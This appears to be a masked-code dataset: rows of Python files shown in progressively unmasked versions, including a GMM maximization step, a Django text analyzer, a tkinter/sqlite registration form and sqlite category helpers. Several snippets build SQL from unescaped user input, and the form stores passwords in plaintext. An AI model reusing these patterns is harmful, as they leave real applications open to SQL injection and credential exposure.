return None, None, None
if type(g) is not np.ndarray or len(g.shape) != 2:
return None, None, None
n, d = X.shape
if n != g.shape[1]:
return None, None, None
k = g.shape[0]
probs = np.sum(g, axis=0)
validation = np.ones((n,))
if not np.isclose(probs, validation).all():
return None, None, None
pi = np.zeros((k,))
m = np.zeros((k, d))
S = np.zeros((k, d, d))
for i in range(k):
pi[i] = np.sum(g[i]) / n
m[i] = np.matmul(g[i], X) / np.sum(g[i])
S[i] = np.matmul(g[i] * (X - m[i]).T, X - m[i]) / np.sum(g[i])
return pi, m, S
| <mask token>
import numpy as np
def maximization(X, g):
"""
Returns: pi, m, S, or None, None, None on failure
"""
if type(X) is not np.ndarray or len(X.shape) != 2:
return None, None, None
if type(g) is not np.ndarray or len(g.shape) != 2:
return None, None, None
n, d = X.shape
if n != g.shape[1]:
return None, None, None
k = g.shape[0]
probs = np.sum(g, axis=0)
validation = np.ones((n,))
if not np.isclose(probs, validation).all():
return None, None, None
pi = np.zeros((k,))
m = np.zeros((k, d))
S = np.zeros((k, d, d))
for i in range(k):
pi[i] = np.sum(g[i]) / n
m[i] = np.matmul(g[i], X) / np.sum(g[i])
S[i] = np.matmul(g[i] * (X - m[i]).T, X - m[i]) / np.sum(g[i])
return pi, m, S
| #!/usr/bin/env python3
"""
Calculates the maximization step in the EM algorithm for a GMM
"""
import numpy as np
def maximization(X, g):
"""
Returns: pi, m, S, or None, None, None on failure
"""
if type(X) is not np.ndarray or len(X.shape) != 2:
return None, None, None
if type(g) is not np.ndarray or len(g.shape) != 2:
return None, None, None
n, d = X.shape
if n != g.shape[1]:
return None, None, None
k = g.shape[0]
# sum of gi equal to 1
probs = np.sum(g, axis=0)
validation = np.ones((n,))
if not np.isclose(probs, validation).all():
return None, None, None
pi = np.zeros((k,))
m = np.zeros((k, d))
S = np.zeros((k, d, d))
for i in range(k):
pi[i] = np.sum(g[i]) / n
m[i] = np.matmul(g[i], X) / np.sum(g[i])
S[i] = np.matmul(g[i] * (X - m[i]).T, X - m[i]) / np.sum(g[i])
return pi, m, S
| null | [
0,
1,
2,
3
] |
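
In row 1,611, `g` is the k-by-n responsibility matrix (the gammas), and the loop implements the standard GMM M-step updates:

```latex
\pi_k = \frac{1}{n}\sum_{i=1}^{n}\gamma_{ki}, \qquad
\mu_k = \frac{\sum_{i=1}^{n}\gamma_{ki}\,x_i}{\sum_{i=1}^{n}\gamma_{ki}}, \qquad
\Sigma_k = \frac{\sum_{i=1}^{n}\gamma_{ki}\,(x_i-\mu_k)(x_i-\mu_k)^{\top}}{\sum_{i=1}^{n}\gamma_{ki}}
```
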
1,612 | 512d0a293b0cc3e6f7d84bb6958dc6693acde680 | <mask token>
def aboutme(request):
return HttpResponse(
" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
<mask token>
def analyze(request):
djtext = request.POST.get('text', 'default')
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
if removepunc == 'on':
punctuations = '!()-[]{};:\'"\\,<>./?@#$%^&*_~'
analyzed = ''
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
dics = {'purpose': 'Removed Punctuations', 'analyzed_text':
analyzed}
djtext = analyzed
if fullcaps == 'on':
analyzed = ''
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if newlineremover == 'on':
analyzed = ''
for char in djtext:
if char != '\n' and char != '\r':
analyzed = analyzed + char
else:
print('no')
print('pre', analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if extraspaceremover == 'on':
analyzed = ''
for index, char in enumerate(djtext):
            if not (djtext[index] == ' ' and index + 1 < len(djtext) and djtext[index + 1] == ' '):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text':
analyzed}
djtext = analyzed
if charcount == 'on':
analyzed = ''
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are',
'analyzed_text': analyzed}
if (removepunc != 'on' and fullcaps != 'on' and newlineremover != 'on' and
extraspaceremover != 'on' and charcount != 'on'):
return HttpResponse('Please Select Any Function And Try Again!')
return render(request, 'analyze.html', dics)
| <mask token>
def index(request):
return render(request, 'index.html')
def aboutme(request):
return HttpResponse(
" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
<mask token>
def analyze(request):
djtext = request.POST.get('text', 'default')
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
if removepunc == 'on':
punctuations = '!()-[]{};:\'"\\,<>./?@#$%^&*_~'
analyzed = ''
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
dics = {'purpose': 'Removed Punctuations', 'analyzed_text':
analyzed}
djtext = analyzed
if fullcaps == 'on':
analyzed = ''
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if newlineremover == 'on':
analyzed = ''
for char in djtext:
if char != '\n' and char != '\r':
analyzed = analyzed + char
else:
print('no')
print('pre', analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if extraspaceremover == 'on':
analyzed = ''
for index, char in enumerate(djtext):
            if not (djtext[index] == ' ' and index + 1 < len(djtext) and djtext[index + 1] == ' '):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text':
analyzed}
djtext = analyzed
if charcount == 'on':
analyzed = ''
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are',
'analyzed_text': analyzed}
if (removepunc != 'on' and fullcaps != 'on' and newlineremover != 'on' and
extraspaceremover != 'on' and charcount != 'on'):
return HttpResponse('Please Select Any Function And Try Again!')
return render(request, 'analyze.html', dics)
| <mask token>
def index(request):
return render(request, 'index.html')
def aboutme(request):
return HttpResponse(
" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
def contact(request):
return HttpResponse(
"<a href='https://nb786.github.io/Ncoder/contact.html' > contact us </a>"
)
def analyze(request):
djtext = request.POST.get('text', 'default')
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
if removepunc == 'on':
punctuations = '!()-[]{};:\'"\\,<>./?@#$%^&*_~'
analyzed = ''
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
dics = {'purpose': 'Removed Punctuations', 'analyzed_text':
analyzed}
djtext = analyzed
if fullcaps == 'on':
analyzed = ''
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if newlineremover == 'on':
analyzed = ''
for char in djtext:
if char != '\n' and char != '\r':
analyzed = analyzed + char
else:
print('no')
print('pre', analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if extraspaceremover == 'on':
analyzed = ''
for index, char in enumerate(djtext):
            if not (djtext[index] == ' ' and index + 1 < len(djtext) and djtext[index + 1] == ' '):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text':
analyzed}
djtext = analyzed
if charcount == 'on':
analyzed = ''
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are',
'analyzed_text': analyzed}
if (removepunc != 'on' and fullcaps != 'on' and newlineremover != 'on' and
extraspaceremover != 'on' and charcount != 'on'):
return HttpResponse('Please Select Any Function And Try Again!')
return render(request, 'analyze.html', dics)
| from django.http import HttpResponse
from django.shortcuts import render
def index(request):
return render(request, 'index.html')
def aboutme(request):
return HttpResponse(
" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
def contact(request):
return HttpResponse(
"<a href='https://nb786.github.io/Ncoder/contact.html' > contact us </a>"
)
def analyze(request):
djtext = request.POST.get('text', 'default')
removepunc = request.POST.get('removepunc', 'off')
fullcaps = request.POST.get('fullcaps', 'off')
newlineremover = request.POST.get('newlineremover', 'off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
if removepunc == 'on':
punctuations = '!()-[]{};:\'"\\,<>./?@#$%^&*_~'
analyzed = ''
for char in djtext:
if char not in punctuations:
analyzed = analyzed + char
dics = {'purpose': 'Removed Punctuations', 'analyzed_text':
analyzed}
djtext = analyzed
if fullcaps == 'on':
analyzed = ''
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
djtext = analyzed
if newlineremover == 'on':
analyzed = ''
for char in djtext:
if char != '\n' and char != '\r':
analyzed = analyzed + char
else:
print('no')
print('pre', analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext = analyzed
if extraspaceremover == 'on':
analyzed = ''
for index, char in enumerate(djtext):
            if not (djtext[index] == ' ' and index + 1 < len(djtext) and djtext[index + 1] == ' '):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text':
analyzed}
djtext = analyzed
if charcount == 'on':
analyzed = ''
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are',
'analyzed_text': analyzed}
if (removepunc != 'on' and fullcaps != 'on' and newlineremover != 'on' and
extraspaceremover != 'on' and charcount != 'on'):
return HttpResponse('Please Select Any Function And Try Again!')
return render(request, 'analyze.html', dics)
| # I Have Created this file -Nabeel
from django.http import HttpResponse
from django.shortcuts import render
def index(request):
return render(request,'index.html')
def aboutme(request):
return HttpResponse (" <a href='https://nb786.github.io/Ncoder/about.html' > Aboutme</a>")
def contact(request):
return HttpResponse ("<a href='https://nb786.github.io/Ncoder/contact.html' > contact us </a>")
def analyze(request):
#get the text
djtext = request.POST.get('text', 'default')
#check checkbox value
removepunc = request.POST.get('removepunc', 'off') #on & off
fullcaps = request.POST.get('fullcaps','off')
newlineremover = request.POST.get('newlineremover','off')
extraspaceremover = request.POST.get('extraspaceremover', 'off')
charcount = request.POST.get('charcount', 'off')
print(removepunc)
#check which checkbox is on
if removepunc == "on":
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
analyzed=""
for char in djtext:
if char not in punctuations:
analyzed=analyzed + char
dics = {'purpose':'Removed Punctuations' , 'analyzed_text':analyzed}
djtext=analyzed
#return render(request,'analyze.html',dics)
if (fullcaps == "on"):
analyzed = ""
for char in djtext:
analyzed = analyzed + char.upper()
dics = {'purpose': 'Changed to Uppercase', 'analyzed_text': analyzed}
# Analyze the text
djtext = analyzed
# return render(request, 'analyze.html', dics)
if (newlineremover == "on"):
analyzed = ""
for char in djtext:
if char != "\n" and char != "\r":
analyzed = analyzed + char
else:
print("no")
print("pre", analyzed)
dics = {'purpose': 'Removed NewLines', 'analyzed_text': analyzed}
djtext=analyzed
# Analyze the text
#return render(request, 'analyze.html', dics)
if (extraspaceremover == "on"):
analyzed = ""
for index, char in enumerate(djtext):
            if not (djtext[index] == " " and index+1 < len(djtext) and djtext[index+1] == " "):
analyzed = analyzed + char
dics = {'purpose': 'Removed the Extra Spaces', 'analyzed_text': analyzed}
djtext = analyzed
#return render(request, 'analyze.html', dics)
if (charcount == "on"):
analyzed = ""
for char in djtext:
analyzed = len(djtext)
dics = {'purpose': 'Total no. of Character in your text are', 'analyzed_text': analyzed}
if (removepunc != "on" and fullcaps != "on" and newlineremover != "on" and extraspaceremover != "on" and charcount!= "on"):
return HttpResponse("Please Select Any Function And Try Again!")
return render(request, 'analyze.html', dics)
| [
2,
3,
4,
5,
6
] |
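
The checkbox handlers in row 1,612 all follow the same character-filter pattern. The space collapser in isolation, matching the corrected comparison against `' '` (the original compared against the empty string, which no single character ever equals):

```python
def remove_extra_spaces(text):
    out = ''
    for i, ch in enumerate(text):
        # Drop a space only when the next character is also a space.
        if not (ch == ' ' and i + 1 < len(text) and text[i + 1] == ' '):
            out += ch
    return out

print(remove_extra_spaces('a   b  c'))   # -> 'a b c'
```
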
1,613 | 37cafe5d3d3342e5e4070b87caf0cfb5bcfdfd8d | <mask token>
def sign_in():
root.destroy()
import main
<mask token>
| <mask token>
root.title('Register-Form')
root.geometry('600x450+-2+86')
root.minsize(120, 1)
def delete():
if Entry1.get() == '':
        messagebox.showerror('Register-Form', 'ID is compulsory for delete')
else:
ms = messagebox.askokcancel('Delete Result',
'Would you like to delete this account?')
if ms:
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("delete from student where id='" + Entry1.get() + "'")
c.execute('commit')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
            messagebox.showwarning('Delete Status', 'Deleted Successfully')
conn.close()
def sign_in():
root.destroy()
import main
def insert_info():
idp = Entry1.get()
un = Entry2.get()
password = Entry3.get()
if idp == '' and password == '' and un == '':
        messagebox.showerror('Submit Status', 'All fields are required')
elif Entry3.get() != Entry4.get():
messagebox.showerror('register error', 'please confirm password')
Entry4.delete(0, END)
Entry4.focus()
else:
try:
id1 = Entry1.get()
uname = Entry2.get()
password1 = Entry3.get()
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute(
                'CREATE TABLE IF NOT EXISTS Student (ID INTEGER PRIMARY KEY, Email TEXT, Password TEXT)'
)
c.execute('INSERT INTO Student (ID,Email,Password) VALUES(?,?,?)',
(id1, uname, password1))
conn.commit()
conn.close()
messagebox.showinfo('Register Form',
'Account Created Successfully!')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
except sqlite3.IntegrityError:
messagebox.showerror('Register Form',
f'Please use another id instead of {Entry1.get()} because that id exists'
)
Entry1.focus()
<mask token>
Label1.place(relx=0.35, rely=0.156, height=21, width=44)
Label1.configure(text='Enter ID:')
<mask token>
Label2.place(relx=0.35, rely=0.2, height=31, width=54)
Label2.configure(text='UName:')
<mask token>
Label3.place(relx=0.333, rely=0.289, height=21, width=64)
Label3.configure(text='Password:')
<mask token>
Label4.place(relx=0.267, rely=0.356, height=21, width=104)
Label4.configure(text='Confirm Password:')
<mask token>
Entry1.place(relx=0.45, rely=0.156, height=20, relwidth=0.273)
<mask token>
Entry2.place(relx=0.45, rely=0.222, height=20, relwidth=0.273)
<mask token>
Entry3.place(relx=0.45, rely=0.289, height=20, relwidth=0.273)
<mask token>
Entry4.place(relx=0.45, rely=0.356, height=20, relwidth=0.273)
<mask token>
b0.place(relx=0.467, rely=0.578, height=84, width=87)
b0.configure(text='Sign in')
<mask token>
b1.place(relx=0.767, rely=0.578, height=84, width=87)
<mask token>
B3.place(relx=0.617, rely=0.578, height=84, width=87)
B3.configure(text='Delete')
root.mainloop()
| <mask token>
root = Tk()
root.title('Register-Form')
root.geometry('600x450+-2+86')
root.minsize(120, 1)
def delete():
if Entry1.get() == '':
        messagebox.showerror('Register-Form', 'ID is compulsory for delete')
else:
ms = messagebox.askokcancel('Delete Result',
'Would you like to delete this account?')
if ms:
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("delete from student where id='" + Entry1.get() + "'")
c.execute('commit')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
            messagebox.showwarning('Delete Status', 'Deleted Successfully')
conn.close()
def sign_in():
root.destroy()
import main
def insert_info():
idp = Entry1.get()
un = Entry2.get()
password = Entry3.get()
if idp == '' and password == '' and un == '':
        messagebox.showerror('Submit Status', 'All fields are required')
elif Entry3.get() != Entry4.get():
messagebox.showerror('register error', 'please confirm password')
Entry4.delete(0, END)
Entry4.focus()
else:
try:
id1 = Entry1.get()
uname = Entry2.get()
password1 = Entry3.get()
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute(
                'CREATE TABLE IF NOT EXISTS Student (ID INTEGER PRIMARY KEY, Email TEXT, Password TEXT)'
)
c.execute('INSERT INTO Student (ID,Email,Password) VALUES(?,?,?)',
(id1, uname, password1))
conn.commit()
conn.close()
messagebox.showinfo('Register Form',
'Account Created Successfully!')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
except sqlite3.IntegrityError:
messagebox.showerror('Register Form',
f'Please use another id instead of {Entry1.get()} because that id exists'
)
Entry1.focus()
Label1 = ttk.Label(root)
Label1.place(relx=0.35, rely=0.156, height=21, width=44)
Label1.configure(text='Enter ID:')
Label2 = ttk.Label(root)
Label2.place(relx=0.35, rely=0.2, height=31, width=54)
Label2.configure(text='UName:')
Label3 = ttk.Label(root)
Label3.place(relx=0.333, rely=0.289, height=21, width=64)
Label3.configure(text='Password:')
Label4 = ttk.Label(root)
Label4.place(relx=0.267, rely=0.356, height=21, width=104)
Label4.configure(text='Confirm Password:')
Entry1 = ttk.Entry(root)
Entry1.place(relx=0.45, rely=0.156, height=20, relwidth=0.273)
Entry2 = ttk.Entry(root)
Entry2.place(relx=0.45, rely=0.222, height=20, relwidth=0.273)
Entry3 = ttk.Entry(root, show='*')
Entry3.place(relx=0.45, rely=0.289, height=20, relwidth=0.273)
Entry4 = ttk.Entry(root, show='*')
Entry4.place(relx=0.45, rely=0.356, height=20, relwidth=0.273)
b0 = ttk.Button(root, command=sign_in)
b0.place(relx=0.467, rely=0.578, height=84, width=87)
b0.configure(text='Sign in')
b1 = ttk.Button(root, text='Submit', command=insert_info)
b1.place(relx=0.767, rely=0.578, height=84, width=87)
B3 = ttk.Button(root, command=delete)
B3.place(relx=0.617, rely=0.578, height=84, width=87)
B3.configure(text='Delete')
root.mainloop()
| from tkinter.ttk import *
from tkinter import *
import tkinter.ttk as ttk
from tkinter import messagebox
import sqlite3
root = Tk()
root.title('Register-Form')
root.geometry('600x450+-2+86')
root.minsize(120, 1)
def delete():
if Entry1.get() == '':
        messagebox.showerror('Register-Form', 'ID is compulsory for delete')
else:
ms = messagebox.askokcancel('Delete Result',
'Would you like to delete this account?')
if ms:
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("delete from student where id='" + Entry1.get() + "'")
c.execute('commit')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
            messagebox.showwarning('Delete Status', 'Deleted Successfully')
conn.close()
def sign_in():
root.destroy()
import main
def insert_info():
idp = Entry1.get()
un = Entry2.get()
password = Entry3.get()
if idp == '' and password == '' and un == '':
        messagebox.showerror('Submit Status', 'All fields are required')
elif Entry3.get() != Entry4.get():
messagebox.showerror('register error', 'please confirm password')
Entry4.delete(0, END)
Entry4.focus()
else:
try:
id1 = Entry1.get()
uname = Entry2.get()
password1 = Entry3.get()
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute(
                'CREATE TABLE IF NOT EXISTS Student (ID INTEGER PRIMARY KEY, Email TEXT, Password TEXT)'
)
c.execute('INSERT INTO Student (ID,Email,Password) VALUES(?,?,?)',
(id1, uname, password1))
conn.commit()
conn.close()
messagebox.showinfo('Register Form',
'Account Created Successfully!')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
except sqlite3.IntegrityError:
messagebox.showerror('Register Form',
f'Please use another id instead of {Entry1.get()} because that id exists'
)
Entry1.focus()
Label1 = ttk.Label(root)
Label1.place(relx=0.35, rely=0.156, height=21, width=44)
Label1.configure(text='Enter ID:')
Label2 = ttk.Label(root)
Label2.place(relx=0.35, rely=0.2, height=31, width=54)
Label2.configure(text='UName:')
Label3 = ttk.Label(root)
Label3.place(relx=0.333, rely=0.289, height=21, width=64)
Label3.configure(text='Password:')
Label4 = ttk.Label(root)
Label4.place(relx=0.267, rely=0.356, height=21, width=104)
Label4.configure(text='Confirm Password:')
Entry1 = ttk.Entry(root)
Entry1.place(relx=0.45, rely=0.156, height=20, relwidth=0.273)
Entry2 = ttk.Entry(root)
Entry2.place(relx=0.45, rely=0.222, height=20, relwidth=0.273)
Entry3 = ttk.Entry(root, show='*')
Entry3.place(relx=0.45, rely=0.289, height=20, relwidth=0.273)
Entry4 = ttk.Entry(root, show='*')
Entry4.place(relx=0.45, rely=0.356, height=20, relwidth=0.273)
b0 = ttk.Button(root, command=sign_in)
b0.place(relx=0.467, rely=0.578, height=84, width=87)
b0.configure(text='Sign in')
b1 = ttk.Button(root, text='Submit', command=insert_info)
b1.place(relx=0.767, rely=0.578, height=84, width=87)
B3 = ttk.Button(root, command=delete)
B3.place(relx=0.617, rely=0.578, height=84, width=87)
B3.configure(text='Delete')
root.mainloop()
| from tkinter.ttk import *
from tkinter import *
import tkinter.ttk as ttk
from tkinter import messagebox
import sqlite3
root = Tk()
root.title('Register-Form')
root.geometry("600x450+-2+86")
root.minsize(120, 1)
def delete():
if(Entry1.get()==''):
        messagebox.showerror('Register-Form', 'ID is compulsory for delete')
else:
ms = messagebox.askokcancel('Delete Result', 'Would you like to delete this account?')
if (ms):
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("delete from student where id='"+ Entry1.get() +"'")
c.execute('commit')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
            messagebox.showwarning('Delete Status', 'Deleted Successfully')
conn.close()
def sign_in():
root.destroy()
import main
def insert_info():
idp=Entry1.get()
un=Entry2.get()
password=Entry3.get()
if (idp=='' and password=='' and un==''):
        messagebox.showerror('Submit Status', 'All fields are required')
elif Entry3.get() != Entry4.get():
messagebox.showerror('register error', 'please confirm password')
Entry4.delete(0, END)
Entry4.focus()
else:
try:
id1=Entry1.get();
uname=Entry2.get();
password1=Entry3.get();
conn = sqlite3.connect('userinfo.db')
with conn:
c = conn.cursor()
c.execute("CREATE TABLE IF NOT EXISTS Student (ID INTEGER, Email TEXT, Password1 TEXT, Password2 TEXT)")
c.execute("INSERT INTO Student (ID,Email,Password) VALUES(?,?,?)", (id1, uname, password1))
conn.commit()
conn.close()
messagebox.showinfo('Register Form', 'Account Created Successfully!')
Entry1.delete(0, END)
Entry2.delete(0, END)
Entry3.delete(0, END)
Entry4.delete(0, END)
except sqlite3.IntegrityError:
messagebox.showerror('Register Form', f'Please use another id instead of {Entry1.get()} because that id exists')
Entry1.focus()
Label1 = ttk.Label(root)
Label1.place(relx=0.35, rely=0.156, height=21, width=44)
Label1.configure(text='''Enter ID:''')
Label2 = ttk.Label(root)
Label2.place(relx=0.35, rely=0.2, height=31, width=54)
Label2.configure(text='''UName:''')
Label3 = ttk.Label(root)
Label3.place(relx=0.333, rely=0.289, height=21, width=64)
Label3.configure(text='''Password:''')
Label4 = ttk.Label(root)
Label4.place(relx=0.267, rely=0.356, height=21, width=104)
Label4.configure(text='''Confirm Password:''')
Entry1 = ttk.Entry(root)
Entry1.place(relx=0.45, rely=0.156, height=20, relwidth=0.273)
Entry2 = ttk.Entry(root)
Entry2.place(relx=0.45, rely=0.222, height=20, relwidth=0.273)
Entry3 = ttk.Entry(root, show='*')
Entry3.place(relx=0.45, rely=0.289, height=20, relwidth=0.273)
Entry4 = ttk.Entry(root, show='*')
Entry4.place(relx=0.45, rely=0.356, height=20, relwidth=0.273)
b0 = ttk.Button(root, command=sign_in)
b0.place(relx=0.467, rely=0.578, height=84, width=87)
b0.configure(text='Sign in')
b1 = ttk.Button(root, text='Submit', command=insert_info)
b1.place(relx=0.767, rely=0.578, height=84, width=87)
B3 = ttk.Button(root, command=delete)
B3.place(relx=0.617, rely=0.578, height=84, width=87)
B3.configure(text='''Delete''')
root.mainloop()
| [
1,
4,
5,
6,
7
] |
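
The register form in row 1,613 stores passwords verbatim. A minimal hardening sketch using only the standard library (the helper name is illustrative, not part of the original script):

```python
import hashlib
import os

def hash_password(password):
    # Store a salted PBKDF2 hash instead of the raw password.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)
    return salt.hex() + ':' + digest.hex()
```
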
1,614 | 9b3c2604b428295eda16030b45cf739e714f3d00 | <mask token>
class State(Enum):
ok = True
error = False
<mask token>
def close_db_connection():
try:
connection.close()
except Exception:
print('Error closing connection')
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = ('CREATE TABLE {0} (word varchar(15) primary key, weight real)'
.format(category))
cursor.execute(query)
except Exception:
state = State.error
print('Error with creating new category')
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = 'SELECT * from {0} ORDER BY weight DESC'.format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print('Error with getting data from {0} category'.format(category))
finally:
close_db_connection()
return state.value, data
<mask token>
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = 'SELECT * FROM result'
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
| <mask token>
class State(Enum):
ok = True
error = False
def get_db_connection():
try:
global connection
connection = sqlite3.connect(DB_NAME)
cursor = connection.cursor()
except Exception:
print('Error connection db {0}'.format(DB_NAME))
connection.close()
return
return cursor
def close_db_connection():
try:
connection.close()
except Exception:
print('Error closing connection')
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = ('CREATE TABLE {0} (word varchar(15) primary key, weight real)'
.format(category))
cursor.execute(query)
except Exception:
state = State.error
print('Error with creating new category')
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = 'SELECT * from {0} ORDER BY weight DESC'.format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print('Error with getting data from {0} category'.format(category))
finally:
close_db_connection()
return state.value, data
<mask token>
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = 'SELECT * FROM result'
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
| <mask token>
DB_NAME = 'categories.db'
class State(Enum):
ok = True
error = False
def get_db_connection():
try:
global connection
connection = sqlite3.connect(DB_NAME)
cursor = connection.cursor()
except Exception:
print('Error connection db {0}'.format(DB_NAME))
connection.close()
return
return cursor
def close_db_connection():
try:
connection.close()
except Exception:
print('Error closing connection')
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = ('CREATE TABLE {0} (word varchar(15) primary key, weight real)'
.format(category))
cursor.execute(query)
except Exception:
state = State.error
print('Error with creating new category')
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = 'SELECT * from {0} ORDER BY weight DESC'.format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print('Error with getting data from {0} category'.format(category))
finally:
close_db_connection()
return state.value, data
def set_category_data(category, data):
state = State.ok
try:
cursor = get_db_connection()
for key, value in data:
            query = ('INSERT OR REPLACE INTO {0} (word, weight) VALUES (?, ?)'
                .format(category))
            cursor.execute(query, (key, value))
connection.commit()
except Exception:
state = State.error
print('Error with setting data to database in {0} category'.format(
category))
finally:
close_db_connection()
return state.value
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = "SELECT * FROM result WHERE category = '{0}'".format(category)
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
def get_file_names():
state = State.ok
names = list()
try:
cursor = get_db_connection()
query = 'SELECT * FROM result'
for row in cursor.execute(query):
names.append(row)
except Exception:
state = State.error
print('Error with getting category file names')
finally:
close_db_connection()
return state.value, names
| <mask token>
import sqlite3
from enum import Enum
DB_NAME = 'categories.db'
class State(Enum):
ok = True
error = False
def get_db_connection():
try:
global connection
connection = sqlite3.connect(DB_NAME)
cursor = connection.cursor()
except Exception:
print('Error connection db {0}'.format(DB_NAME))
connection.close()
return
return cursor
def close_db_connection():
try:
connection.close()
except Exception:
print('Error closing connection')
def create_new_category(category):
state = State.ok
try:
cursor = get_db_connection()
query = ('CREATE TABLE {0} (word varchar(15) primary key, weight real)'
.format(category))
cursor.execute(query)
except Exception:
state = State.error
print('Error with creating new category')
finally:
close_db_connection()
return state
def get_category_data(category):
state = State.ok
data = list()
try:
cursor = get_db_connection()
query = 'SELECT * from {0} ORDER BY weight DESC'.format(category)
for row in cursor.execute(query):
data.append(row)
except Exception:
state = State.error
print('Error with getting data from {0} category'.format(category))
finally:
close_db_connection()
return state.value, data
def set_category_data(category, data):
state = State.ok
try:
cursor = get_db_connection()
for key, value in data:
            query = ('INSERT OR REPLACE INTO {0} (word, weight) VALUES (?, ?)'
                .format(category))
            cursor.execute(query, (key, value))
connection.commit()
except Exception:
state = State.error
print('Error with setting data to database in {0} category'.format(
category))
finally:
close_db_connection()
return state.value
def get_file_names_in_category(category):
state = State.ok
names = list()
try:
